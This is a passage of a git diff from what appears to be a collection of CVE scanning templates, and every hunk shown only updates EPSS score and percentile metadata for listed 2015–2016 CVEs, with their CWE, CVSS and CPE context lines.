@@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99751 + epss-percentile: 0.99756 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 0c94435848..2d10c82a4b 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84577 + epss-percentile: 0.84665 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 64952bb66a..11d39f8497 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00277 - epss-percentile: 0.64703 + epss-percentile: 0.64851 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 7bf5e10d20..390108d040 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.00284 - epss-percentile: 0.65157 + epss-percentile: 0.65327 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 6a54a96234..1f36b3e2a2 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 - epss-percentile: 0.52469 + epss-percentile: 0.52544 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 146702ec93..3565a57be4 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-7245 cwe-id: CWE-22 epss-score: 0.96881 - epss-percentile: 0.99632 + epss-percentile: 0.99643 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 771ee13d37..6fe5c9d126 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00239 - epss-percentile: 0.61714 + epss-percentile: 0.61895 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 1cb19dce20..8bce4c3ce3 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.9739 - epss-percentile: 0.999 + epss-percentile: 0.99906 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index da2916da95..12925cbd50 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.51142 + epss-percentile: 0.51228 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 35513fc5fe..48d76a34b4 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61172 + epss-percentile: 0.61339 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 0a55d8cd36..6f98355d51 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 - epss-percentile: 0.47567 + epss-percentile: 0.4767 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 66975ca9e6..fdd430c95f 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-8399 cwe-id: CWE-200 epss-score: 0.9655 - epss-percentile: 0.99504 + epss-percentile: 0.99519 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index f31ce86d95..c7cc7900d5 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.73926 + epss-percentile: 0.74057 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 87d5493831..d549e34492 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index a9938e4a4b..bdb6295b4b 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2015-9323 cwe-id: CWE-89 - epss-score: 0.00846 - epss-percentile: 0.80189 + epss-score: 0.00869 + epss-percentile: 0.80542 cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index c4151cffce..18981ccc26 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-9414 cwe-id: CWE-79 epss-score: 0.00111 - epss-percentile: 0.44077 + epss-percentile: 0.44158 cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index c0797ed689..e1665968eb 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - epss-score: 0.31679 - epss-percentile: 0.96552 + epss-score: 0.37884 + epss-percentile: 0.96862 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index ef1928e067..2c808b0a2e 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.03344 - epss-percentile: 0.90339 + epss-percentile: 0.90398 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 68d9de176d..03d5a778c8 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 893efd080d..ee92120b32 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 825d316bdf..f725f0b4f5 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49806 + epss-score: 0.00101 + epss-percentile: 0.41115 cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 30271e72e5..cab3b3853c 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000129 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 698bd404f1..799f8b4f1c 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000130 cwe-id: CWE-79 epss-score: 0.00093 - epss-percentile: 0.38846 + epss-percentile: 0.38905 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index b49765daf5..90b329be76 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49806 + epss-score: 0.00101 + epss-percentile: 0.41115 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index d3580c2873..154d79e214 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000132 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45063 + epss-percentile: 0.45168 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index f68ea329e6..674a3fa59a 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000133 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49663 + epss-percentile: 0.49767 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 3eebe36650..275e6c646a 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49806 + epss-score: 0.00101 + epss-percentile: 0.41115 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index f227aee8d0..f6d4a7b6f8 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49806 + epss-score: 0.00101 + epss-percentile: 0.41115 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 75dd091159..73fd792512 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000136 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index dcf54480c2..9fcc2f97af 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49806 + epss-score: 0.00101 + epss-percentile: 0.41115 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 661bceb72a..e287cb2e13 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000138 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 74960b68de..9b32789a58 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000139 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45063 + epss-percentile: 0.45168 cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 3cf05a91dd..f448c63569 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000140 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index a7d01fbb9e..c197403e96 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000141 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49663 + epss-percentile: 0.49767 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index df7400be6b..0a869662d6 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41416 + epss-percentile: 0.415 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 5bbb52edee..c8c79f54ce 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000143 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49663 + epss-percentile: 0.49767 cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index c69080d170..edbef68c49 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000146 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 82b856ada7..899610f139 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 7c442a5430..fcabb7da84 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45664 + epss-percentile: 0.45775 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index ac10c66468..74f8cb4f78 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000152 cwe-id: CWE-79 - epss-score: 0.00353 - epss-percentile: 0.68832 + epss-score: 0.00251 + epss-percentile: 0.63018 cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index a812814656..c0fca5261e 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49806 + epss-score: 0.00101 + epss-percentile: 0.41115 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 5292f839a3..84f82dd99a 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49663 + epss-percentile: 0.49767 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index c3e0fb62b3..cca813997b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41416 + epss-percentile: 0.415 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 251d9e949a..0668a88698 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 - epss-score: 0.97464 - epss-percentile: 0.99956 + epss-score: 0.97455 + epss-percentile: 0.99951 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index cdc749070f..b831f8855a 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10108 cwe-id: CWE-77 epss-score: 0.84608 - epss-percentile: 0.98195 + epss-percentile: 0.98225 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index f336d8c25b..5719763a97 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10134 cwe-id: CWE-89 epss-score: 0.05366 - epss-percentile: 0.92309 + epss-percentile: 0.92355 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index a247e7ddf1..e90887e531 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10367 cwe-id: CWE-22 epss-score: 0.01346 - epss-percentile: 0.84574 + epss-percentile: 0.84662 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index ff01790df3..784b4c59a7 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-10368 cwe-id: CWE-601 epss-score: 0.00179 - epss-percentile: 0.54948 + epss-percentile: 0.55112 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 4e62d3a64d..bb7b67d508 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - epss-score: 0.01488 - epss-percentile: 0.85357 + epss-score: 0.01429 + epss-percentile: 0.85146 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 3c203a30c5..178218a178 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-10940 cwe-id: CWE-89 epss-score: 0.00755 - epss-percentile: 0.78936 + epss-percentile: 0.79034 cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index d396db3da2..e60f5db3a4 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - epss-score: 0.01657 - epss-percentile: 0.86193 + epss-score: 0.01238 + epss-percentile: 0.83962 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 10e466d89e..f78a7e444c 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-10960 cwe-id: CWE-20 - epss-score: 0.01127 - epss-percentile: 0.82963 + epss-score: 0.01469 + epss-percentile: 0.85345 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index c01f06744c..cc7f58acc9 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54754 + epss-percentile: 0.54918 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 7989e9ea0d..0f81c1d6a2 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62347 + epss-percentile: 0.62493 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index b8989212d7..8ed041033e 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - epss-score: 0.97321 - epss-percentile: 0.99858 + epss-score: 0.97354 + epss-percentile: 0.99883 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index d4a93e0e45..1641c2be7d 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-2389 cwe-id: CWE-22 epss-score: 0.24589 - epss-percentile: 0.96176 + epss-percentile: 0.96201 cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git 